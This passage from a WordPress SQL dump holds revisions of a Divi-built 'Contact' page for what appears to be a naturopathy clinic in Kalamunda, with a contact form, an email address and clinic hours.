module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.4.8\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_margin=\"-70px||||false|false\" custom_padding=\"2px|||||\"][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#000000\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#000000\" background_color_gradient_end=\"rgba(0,0,0,0.64)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-02.jpg\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Submit Message\" _builder_version=\"4.9.4\" form_field_background_color=\"rgba(0,0,0,0)\" form_field_text_color=\"rgba(255,255,255,0.7)\" form_field_custom_margin=\"||30px||false|false\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#ffffff\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"1px\" border_color_all=\"#ffffff\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong>Clinic location:</strong></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" locked=\"off\" background_enable_image=\"off\" sticky_enabled=\"0\" global_module=\"188\" saved_tabs=\"all\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Book Now\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#C7D3BA\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Playfair Display|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" button_border_color=\"#000000\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-05-26 20:09:45','2021-05-26 12:09:45','',26,'https://verde.desidrivers.com.au/?p=189',0,'revision','',0); INSERT INTO `wpln_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (169,1,'2021-05-26 14:48:38','2021-05-26 06:48:38','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.4.8\" background_color=\"#f9f3eb\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(249,243,235,0.8)\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-21.png\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||170px||false|false\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\" sticky_enabled=\"0\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.4.8\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_margin=\"-70px||||false|false\" custom_padding=\"2px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#000000\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#000000\" background_color_gradient_end=\"rgba(0,0,0,0.64)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-02.jpg\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Submit Message\" _builder_version=\"4.9.4\" form_field_background_color=\"rgba(0,0,0,0)\" form_field_text_color=\"rgba(255,255,255,0.7)\" form_field_custom_margin=\"||30px||false|false\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#ffffff\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"1px\" border_color_all=\"#ffffff\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" hover_enabled=\"0\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong>Clinic location:</strong></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-21.png\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" locked=\"off\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" hover_enabled=\"0\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\" custom_margin=\"|||265px||\" sticky_enabled=\"0\" border_color_all=\"#ccd4c8\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Book Now\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#C7D3BA\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Playfair Display|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" button_bg_enable_color=\"on\" button_icon_color=\"#000000\" button_text_color=\"#000000\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" custom_padding=\"||0px|||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-05-26 14:48:38','2021-05-26 06:48:38','',26,'https://verde.desidrivers.com.au/?p=169',0,'revision','',0),(193,1,'2021-05-26 20:13:34','2021-05-26 12:13:34','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.4.8\" background_color=\"#f9f3eb\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(249,243,235,0.8)\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-21.png\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||170px||false|false\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.4.8\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_margin=\"-70px||||false|false\" custom_padding=\"2px|||||\"][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#000000\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#000000\" background_color_gradient_end=\"rgba(0,0,0,0.64)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-02.jpg\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Submit Message\" _builder_version=\"4.9.4\" form_field_background_color=\"rgba(0,0,0,0)\" form_field_text_color=\"rgba(255,255,255,0.7)\" form_field_custom_margin=\"||30px||false|false\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#ffffff\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"1px\" border_color_all=\"#ffffff\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.4.7\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" 